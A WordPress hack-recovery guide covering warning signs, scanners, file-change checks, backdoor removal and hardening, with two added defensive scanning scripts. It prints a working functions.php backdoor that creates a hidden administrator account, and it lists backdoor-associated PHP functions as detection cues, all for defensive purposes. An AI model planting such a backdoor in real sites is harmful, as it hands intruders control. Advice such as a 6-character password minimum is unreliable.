Are you worried and asking yourself these questions?
- Is my WordPress site hacked?
- Why can’t I log in?
- How do I clean a WordPress hack?

Those are the last questions you ever want to ask as a serious webmaster. But the numbers don’t lie. In early 2019, website security provider Sucuri released a damning report. The 2018 Hacked Website Trend Report showed that a startling 90% of the hacks analyzed were WordPress hacks.
The report was based on an analysis of 4.4 million cleaned files and 18,302 infected websites.
At the end of August 2019, another backdoor attack warning was sent out through WordFence to over 60 million WordPress site owners.
WordPress does have structures and able developer communities that help protect users against malware and hack attacks. But WordPress websites make up over 30% of all websites, making it a prime target for malicious attacks.
In this ultimate guide to cleaning your hacked WordPress website, you’ll learn why sites get hacked, what a hack looks like, and how to respond, so you can take the right actions immediately and recover in no time.
We’ve organized the guide into the following sections:
- Why Do WordPress Websites Get Hacked?
- Signs Your WordPress Site is Hacked
- How to Check If Your WordPress Site Was Hacked?
- How to Fix A Hacked WordPress Website
- How to Prevent Another Hack Attack in 2021
You’ll notice our proven recommendations for tools, products, tips, and techniques to help you clean a hacked WordPress site where applicable.
As always, we won’t recommend more than three tools at a time for the same job to avoid “choice-whelm”. Just enough to help you get the job done right now.
It’s grueling and overwhelming enough to know your WordPress site has been hacked.
Shall we begin?
Why Do WordPress Sites Get Hacked?
But why, you ask?
A successful WordPress hack can mean a bunch of nasty things for you, including:
- Leaking sensitive customer information to unknown people
- Losing access to your website’s key areas such as cPanel and the database
- Losing huge traffic through redirects to spam sites, ad pages, and phishing programs
- Being blocked by search engines
- Losing full access to your website, meaning losing it all
- A suspension by your WordPress hosting service
- Being blacklisted by other websites
Remember, losing other people’s sensitive personal data and exposing them to identity theft are among the biggest concerns of many people. So a breach could also land you in double trouble with fines and penalties.

Source: Gallup
Conversely, all these grueling possibilities can be a goldmine for a hacker.
They can redirect the traffic to gain clicks on ads for monetary gains, collect emails, and fetch transactional information such as credit card numbers for other, more personal attacks.
They can also use your site to build a network of compromised websites, which in turn attack other sites with, say, a Distributed Denial of Service (DDoS) attack to cripple a competing site.
Beginner hackers could be training or testing their new-found abilities by knocking the server lights off your weakened website.
Some are weird enough to pull a WordPress hack just to see how you’d react. Picture that.
But many WordPress hacks in 2019 were also highly motivated by the “opportunity” to demand a ransom from unsuspecting, desperate website owners.
Still, in 2018 over 73% of WordPress websites had known security vulnerabilities that hackers could have exploited with basic tools and know-how.
How do you know if your WordPress website is hacked?

Signs Your WordPress Website Got Hacked

Well, that’s not good Google
The signs will fall under one of the following malware types:

Source: Sucuri
Now, can you spot the following?
- You can’t find your website online any more
- It crashes like never before
- Your site redirects to another website or page
- If you can even see them, your server logs show activity you had nothing to do with
- There are weird code fragments in your site’s header or footer
- It displays unconventional ads you would not commission, mostly pharmaceutical type of ads
- You’ve received emails from other webmasters telling you your site is sending them SEO spam or appears to be hacked
- Google sends you a hacked warning
- The site itself displays an in-your-face popup saying it’s been hacked
- A drastic or gradual drop in traffic out-of-the-blue
- Increased background processes that you didn’t start or allow, so the site is slow or unresponsive
- You can’t access the wp-admin URL
- You can’t access your WordPress database, FTP client, or the web host
- You can’t send or receive WordPress emails
- Visitors complain their antimalware programs are flagging your site
- The appearance of new users and user permissions you didn’t authorize
- The website protocol changed or changes from HTTPS to
Check out the additional signs in the following infographic:

Credit: Hacker Combat
If you notice the signs your WordPress site is at risk, the next thing is to try to find out how the hack happened immediately.
How To Check If a WordPress Site Is Hacked
Signs your WordPress site is hacked don’t necessarily mean the site’s been hacked.
To be sure and know exactly how to clean the hacked website, do the following.
Properly Scan Your Site

Do a full site scan of your WordPress Site to catch malware using the best WordPress security plugin.
We recommend using Sucuri WordPress Scanner or iThemes Security or WordFence Scanner.
These are comprehensive WordPress security providers, complete with malware scanners, automated WordPress security plugins, and proven solid web application firewalls.
After installing and activating Sucuri Scanner, for example, go to Dashboard Admin >> Sucuri Security >> Dashboard to see any threats to deal with.
Sucuri Scanner, for example, can also scan your WordPress site remotely.

Don’t Forget to Check Recently Modified Files
When someone hacks into your account, there are high chances that they’ll modify some files. For that reason, you must check out any such files to help detect suspicious activity.
Here’s how to do it:
Manually Check Recently Modified Files
- Log into your server using SSH (an FTP client can list files but cannot run commands) and type in and execute this command:
$ find ./ -type f -mtime -15
- It’ll pull up all files modified in the last 15 days
- Manually review the last modified date column to catch any suspicious file changes
Use Terminal Commands on Linux
Here’s how to check recently modified files using terminal commands in Linux (the examples use /etc; for a WordPress site, substitute the path of your web root):
- Type in
$ find /etc -type f -printf '%TY-%Tm-%Td %TT %p\n' | sort -r
- Now, type in the following command in your terminal to list directories as well as files, newest first:
$ find /etc -printf '%TY-%Tm-%Td %TT %p\n' | sort -r
Look out for any suspicious file modifications in the last 30 days.
Note: Hackers do change dates on recently modified files to avoid being detected this way. So we recommend using these other diagnostic tools.
Check Your Site’s Security Status in Your Webmaster Tool
Use Google’s Safe Browsing Site Status to see if entering your URL brings up any specific malware, malicious spam, or unauthorized redirects.
You can also use Norton SafeWeb, Bing Webmaster Tools, and Google Webmaster Central.
That way, you may be able to determine the most important aspect of it all: how your site was hacked.
That way, you can begin to understand what and which areas could be compromised, for how long, and how to clean your hacked site.
And how do you clean a hacked WordPress site?
How To Fix Your Hacked WordPress Site
It can be shocking to learn your WordPress site has been hacked. But it is not the time to panic, either. You can recover a hacked website if you know what to do as soon as you find out.
Here’s a step-by-step guide to cleaning a hacked WordPress website.
Restore From Previous Backups

If you can still log in and make some changes, restore a previous backup from a time before you started seeing hack signs.
This is the simplest way to jumpstart your site before it’s hacked away from you.
If you’ve already used VaultPress or best VaultPress alternatives such as UpDraftPlus, BlogVault (includes WooCommerce backup), or BackUpBuddy (automated WordPress backups), it should be a few clicks’ job.
If you hadn’t backed up your site, that’s a bummer, but keep reading below.
If you can’t log in from your WordPress Administration Screen, contact your web host. Hosting plans usually come with tools such as Adminer, Search-Replace-DB, or phpMyAdmin.
These tools let admins log in directly to the database, bypassing the WordPress login screen, so they can reset user permissions and lock intruders out.

Do this immediately so you can do the following.
Reinstall WordPress Themes And Plugins
Most WordPress hacks are made through outdated or compromised WordPress plugins and themes.
Check your installed plugins under Dashboard >> Plugins. Click on each and update them to the latest release.
Often, developers release a new update to patch up a vulnerability, improve performance metrics, or both. So, they may have patched up the “backdoor”.
Temporarily Place Your Site In Maintenance Mode
Use a plugin such as Coming Soon Page Mode and Maintenance Mode to inform visitors, search engines, and the hackers the site is out temporarily.
There are free and paid versions.
The paid plugin allows you to:
- Collect visitors’ emails
- Display HTTP status code 503 to keep search crawlers from suspending your site as a malware pit
- Add footer branding to let everyone know it’s still your site.
Reset Passwords
Change the critical passwords to your site’s:
- cPanel
- WP dashboard
- File Transfer Protocol (always use Secure FTP or SFTP)
- MySQL database
See how to change your WordPress username in this quick video:
Then go to cPanel >> Security >> Password Protect Directories >> WebRoot (in the popup) >> wp-admin. Then follow the prompts to password-protect your site again.
Remove Malware From Your WordPress Site
Before you do anything here, ensure you’ve backed up your site with a secure and dependable WordPress backup plugin.
And if you are not sure how to edit files in your WP database, feel free to ask for help.
Note: Doing it wrong can crash your site.
Changing the passwords keeps everyone else out while you clean your hacked site: the files and the tables in your database.
Here’s how to do that.
Cleaning Hacked WordPress Files
- Use secure FTP (SFTP) or SSH to log into your server
- See files that were recently changed
- Note the date, time, and user that made the changes and determine if they were authorized changes
- Reinstate the suspicious files from the WP repository
- Open any file that’s not in the original repository with a text editor
- Cut out any suspicious lines of code within the custom files
After these steps, go back and verify the site is working as it should again. If not, restore the WordPress backup you made before making the changes, then look for other malicious code to remove.
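To tell which files differ from the WordPress repository before reinstating them, compare the install against the official per-release checksums. This is an added example, not the guide’s own code: the checksum URL is WordPress’s real API (the same list WP-CLI’s `wp core verify-checksums` uses), while the files and hashes built in demo() are constructed so the check runs offline.

```python
"""Compare a WordPress install against the official core checksums, which
WordPress publishes per release (MD5 of every core file) at
https://api.wordpress.org/core/checksums/1.0/?version=<ver>&locale=en_US"""
import hashlib
import json
import os
import tempfile
import urllib.request

def fetch_core_checksums(version, locale="en_US"):
    """Download the official {relative_path: md5} map for one release."""
    url = f"https://api.wordpress.org/core/checksums/1.0/?version={version}&locale={locale}"
    return json.load(urllib.request.urlopen(url, timeout=30))["checksums"]

def md5_of(path):
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_core(webroot, checksums):
    """Return (modified, missing, unexpected) lists of webroot-relative paths."""
    modified, missing, unexpected = [], [], []
    for rel, expected in checksums.items():
        path = os.path.join(webroot, rel)
        if not os.path.isfile(path):
            missing.append(rel)
        elif md5_of(path) != expected:
            modified.append(rel)
    # wp-admin/ and wp-includes/ hold nothing but core files, so anything
    # there that is not on the official list was added after installation.
    for core_dir in ("wp-admin", "wp-includes"):
        for dirpath, _, files in os.walk(os.path.join(webroot, core_dir)):
            for name in files:
                rel = os.path.relpath(os.path.join(dirpath, name), webroot)
                rel = rel.replace(os.sep, "/")
                if rel not in checksums:
                    unexpected.append(rel)
    return sorted(modified), sorted(missing), sorted(unexpected)

def demo():
    """Offline run on a constructed mini webroot, not a real install."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "wp-includes"))
    files = {  # relative path -> constructed file content
        "index.php": b"<?php // unchanged core file\n",
        "wp-includes/version.php": b"<?php // tampered core file\n",
        "wp-includes/cache-helper.php": b"<?php // never shipped by core\n",
    }
    for rel, content in files.items():
        with open(os.path.join(root, rel), "wb") as f:
            f.write(content)
    checksums = {  # constructed stand-in for the API response
        "index.php": hashlib.md5(files["index.php"]).hexdigest(),
        "wp-includes/version.php": hashlib.md5(b"<?php // original\n").hexdigest(),
        "wp-includes/load.php": "0" * 32,  # listed by core, absent on disk
    }
    return verify_core(root, checksums)
```

Against a live install, pass `fetch_core_checksums("<your version>")` and the web root to `verify_core`; anything in the modified or unexpected lists is what to reinstate or inspect, and wp-content/ (themes, plugins, uploads) still needs the manual review described above.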
Cleaning Hacked Database Tables
Again, seek professional help if you have any doubts.
- Log into your database admin panel
- Ensure you’ve made the necessary backups
- Look for suspicious content, including spammy links and keywords
- When you see any, open the table it is contained in
- Delete the suspicious content
- Verify the site is working as it should
- Manually remove any database-access tool you may have
If you’d rather clean your WordPress database with a plugin after a hack, use the WP-Optimizer plugin to get it done. It’ll go deeper and clean any junk you don’t need so you can also increase your WordPress loading speed.
Remove Hidden Backdoors

To remove WordPress backdoors, you must detect and find them first, of course.
So, how do you do that?
To find a WordPress backdoor in a theme, start with inactive themes. Look out for the functions.php file, then examine whether it has been injected with suspicious code.
Here’s an example code showing an infected functions.php file:
<?php
// Hooked into wp_head, so this runs on every front-end page load.
add_action('wp_head', 'WordPress_backdoor');
function WordPress_backdoor() {
    // Triggered by a query-string parameter no legitimate theme would read.
    if ($_GET['backdoor'] == 'go') {
        require('wp-includes/registration.php');
        // Silently creates an administrator account with a hard-coded password.
        if (!username_exists('backdooradmin')) {
            $user_id = wp_create_user('backdooradmin', 'Pa55W0rd');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}
?>
Functions.php WordPress theme backdoor example
To find a backdoor in a WordPress plugin (like in Contact Form 7), make an FTP search to reveal the buggy plugins. You can’t see them on the dashboard.
Often, installation files containing backdoors will have hogwash code you’ll recognize pretty fast.
Now To Delete WordPress Backdoors:
- Delete the .htaccess file by going to Settings>>Permalink, then delete and save changes. The .htaccess file regenerates itself, so no problems with figuring out how to recreate it.
- Delete all inactive themes
- Delete all inactive plugins
- Delete all infected plugins and redownload the most up-to-date versions
- Let your developer inspect the uploads directory on your behalf and fix any trouble in the extremely sensitive wp-config.php file
To ease your work, you can use one of the WordPress malware cleaners recommended here to find and fix backdoors fast.
The best ones, such as Sucuri and iThemes Security, will alert you as soon as they find a backdoor so you can fix it before it becomes a problem.

Common PHP Functions In Backdoors
There are some common functions you can look out for and use to identify WordPress backdoors.
Here they are:
- exec
- eval
- stripslashes
- preg_replace (with the /e modifier)
- move_uploaded_file
- gzuncompress
- str_rot13
- base64_decode / base64_encode
- assert
- system
Sucuri also recently reported how some hackers are using “excerpt” to run commands via a WordPress backdoor.
You can often recognize malicious code by its obfuscation, such as encoded or compressed strings, which legitimate files in the WordPress repository rarely use.
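The following added example (not from the guide or from Sucuri) turns the recently-modified-files check and the function list above into one scan: it flags PHP files changed within the 15-day window and reports every line that calls a listed function, with the administrator-creation pattern from the functions.php sample added as a heuristic. The three files written by demo() are constructed so it runs offline.

```python
"""Flag PHP files that changed recently or call functions common in WordPress backdoors."""
import os
import re
import tempfile
import time

# Plain function names from the guide's list; PHP names are case-insensitive.
FUNCS = ("eval", "assert", "exec", "system", "base64_decode", "base64_encode",
         "str_rot13", "gzuncompress", "stripslashes", "move_uploaded_file")
PATTERNS = {
    "listed function": re.compile(r"\b(?:" + "|".join(FUNCS) + r")\s*\(", re.I),
    # the /e modifier (removed in PHP 7) made preg_replace evaluate its replacement as code
    "preg_replace /e": re.compile(r"\bpreg_replace\s*\(\s*['\"]/[^'\"]*/\w*e\w*['\"]", re.I),
    # shape of the functions.php sample above: an administrator created on request
    "admin creation": re.compile(r"\bwp_create_user\s*\(|\bset_role\s*\(\s*['\"]administrator", re.I),
}

def scan_file(path, max_age_days=15, now=None):
    """Return findings for one file: a note if it changed within max_age_days
    (the guide's 15-day window) plus every pattern hit with its line number."""
    now = time.time() if now is None else now
    findings = []
    age = (now - os.path.getmtime(path)) / 86400
    if age < max_age_days:
        findings.append(f"modified {age:.1f} days ago")
    with open(path, encoding="utf-8", errors="replace") as f:
        for lineno, line in enumerate(f, 1):
            for label, rx in PATTERNS.items():
                if (m := rx.search(line)):
                    findings.append(f"line {lineno}: {label}: {m.group(0)}")
    return findings

def scan_tree(webroot, max_age_days=15, now=None):
    """Scan every .php file under webroot; return {relative_path: [findings]}."""
    report = {}
    for dirpath, _, files in os.walk(webroot):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                findings = scan_file(path, max_age_days, now)
                if findings:
                    report[os.path.relpath(path, webroot).replace(os.sep, "/")] = findings
    return report

def demo():
    """Offline run over three constructed files (not taken from any real site)."""
    root = tempfile.mkdtemp()
    samples = {  # relative path -> constructed content
        "wp-content/plugins/demo/clean.php": "<?php echo esc_html(get_option('blogname'));\n",
        "wp-content/uploads/2019/cache.php": "<?php eval(base64_decode('Y29uc3RydWN0ZWQ='));\n",
        "wp-content/themes/old/functions.php": "<?php $u = new WP_User(wp_create_user('x', 'y')); $u->set_role('administrator');\n",
    }
    for rel, body in samples.items():
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        with open(os.path.join(root, rel), "w") as f:
            f.write(body)
    old = time.time() - 60 * 86400  # make the clean plugin file two months old
    os.utime(os.path.join(root, "wp-content/plugins/demo/clean.php"), (old, old))
    return scan_tree(root)
```

The hits are leads, not verdicts: legitimate plugins also call some of these functions, and as the note above says, attackers can reset modification times, so review each flagged file against a clean copy rather than deleting on sight.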
Remove Suspicious Users
An easy way to go about it is to use the Sucuri WordPress plugin as an admin to delete an unauthorized user or to change an authorized user’s password.
There’s a manual route if you so choose.
Just log in and go to Users. Then hover over the suspicious user and delete their account.

Remove Unwanted Files
Scanning for unwanted files manually can not only be tedious, but it can make you skip or miss a bunch of malicious files in the process.
Use a top security plugin for that.
Use Sucuri or WordFence to identify any new or inappropriate files.
The tools will flag any file that shouldn’t be there, and you can decide whether to delete it or keep it.
Remove Malware Warnings
Spam authorities detect and issue suspension warnings against infected sites. Those include Google, the largest search engine provider.
How to remove malware warnings in WordPress?
If you’ve been served such a warning, you’ll need to submit a request to have your site cleared and the suspension lifted.
You’ll need to fill in such a form for each of the authorities that issued you a warning.
And you may have to explain how you got rid of the malware.
However, if you’ve installed Sucuri Security, it’ll do that on your behalf.
Install SSL Certificate
Contact your web host service for this. Some can provide you with a free SSL certificate.
If you prefer to go out on your own, though, check out CloudFlare for a free SSL certificate for WordPress.
The Cloudflare WordPress plugin also offers premium DDoS protection for WordPress, so you’ll have a firm grasp on your domain protections with it.
Move To Secured WordPress Hosting
Upgrade to premium WordPress hosting
The cheapest shared WordPress hosting services tend to expose subscribers to DDoS and other attacks. So, use reputable ones such as Bluehost, inMotion Hosting, or GoDaddy.
But if you are ready to use much superior protection, go for secure MySQL database services such as DigitalOcean.
But for the best and most secure, choose SiteGround, WP Engine, or Kinsta for managed WordPress hosting.

Clean Out Your Sitemap And Resubmit To Google
You can clean and create a new WordPress sitemap easily using a top WordPress SEO plugin.
The two best for the job are Yoast SEO WordPress plugin and All in One SEO Pack plugins.
Using such plugins, you can create an XML sitemap of your recovered site to submit to Google via Google Search Console to have the search engine start crawling your site again.
If this all feels like a lot of work or is too techy, feel free to ask a professional to do it on your behalf.
How To Prevent WordPress Hacking In The Future
It is not enough to just recover your WordPress website after a hack. Do the following to harden your site against future attempts.
Add Stronger Passwords
Use a minimum of 6 characters, a combination of letters, special characters, and numbers, for your login, database, and
You can use a strong password generator, such as the Force Strong Passwords plugin, to ensure your other users use strong passwords for their accounts as well.
If you’re worried about forgetting the strong password, use one of the best password managers, such as 1Password, LastPass, or DashLane.

Update The WordPress Version
A 2018 WordPress vulnerabilities report showed that if you are still using WordPress 4.0 or an earlier version, you are at the highest risk of being hacked.
WordPress v5.3 has been out for a while now. Take advantage and download the latest now for security patch-ups to known vulnerabilities.
Generate New Secret Keys
Your WordPress database security keys handle the encryption of cookie information. Clear the old ones and create fresh ones using the tool WordPress provides.
If you are even a bit unsure, contact your web host or professional WordPress security service provider for help.
When done improperly, changing your database security keys can crash your site.
Never Use Nulled Themes And Plugins

Investing in the best WordPress themes and plugins costs a bit of money.
But the figure can be nothing compared to what and how much you can lose or the cost of recovering from a WordPress website hacking.
Only use free WordPress plugins if they are reputable. Often, though, use paid themes and plugins because they are regularly updated with security and other performance-boosting packs.
Set Backups: Use The Best WordPress Backup Plugin
Use VaultPress to back up safe versions of your website. Do this immediately and regularly, depending on how many changes you make to your site over any given period.
If you have a big site with multiple pages and files changing frequently, you can choose the daily backup option.
If yours is a static website that doesn’t make as many changes to its database and framework, you can opt for the weekly or biweekly backup options.
Remember, frequent backups can over time weigh down WordPress page loading speed if they are not cleaned up.
Website Firewall: Strengthen Your WordPress Site
Use the top web application firewall plugins or apps to harden your site and automatically curb brute force, DDOS, and other attacks.
WebARX, Kinsta, iThemes Security, and Sucuri are great full-blown web application firewall providers you can work with right now.
Also, use the Perfmatters plugin or Disable XML-RPC Plugin to disable the passing of multiple commands in a single HTTP request, something a hacker would do.

Final Thoughts: Never Let Your WordPress Website Get Hacked Again
Cleaning a hacked WordPress website can be a long, frustrating, and potentially expensive process in every sense.
The best you can do is to recover your hacked site and apply the best WordPress hardening methods to secure the site against future attacks.
One of the foremost ways to do that is always to back up your site. Do this as frequently as possible.
Next up, use a top WordPress security plugin. Then ensure your WordPress core, themes, and plugins are all updated and malware-free. With those three WordPress security best practices well in place, you can curb most hack attempts. But in case an unrelenting hacker compromises your site, follow this guide to cleaning a hacked WordPress site to get back your online assets.
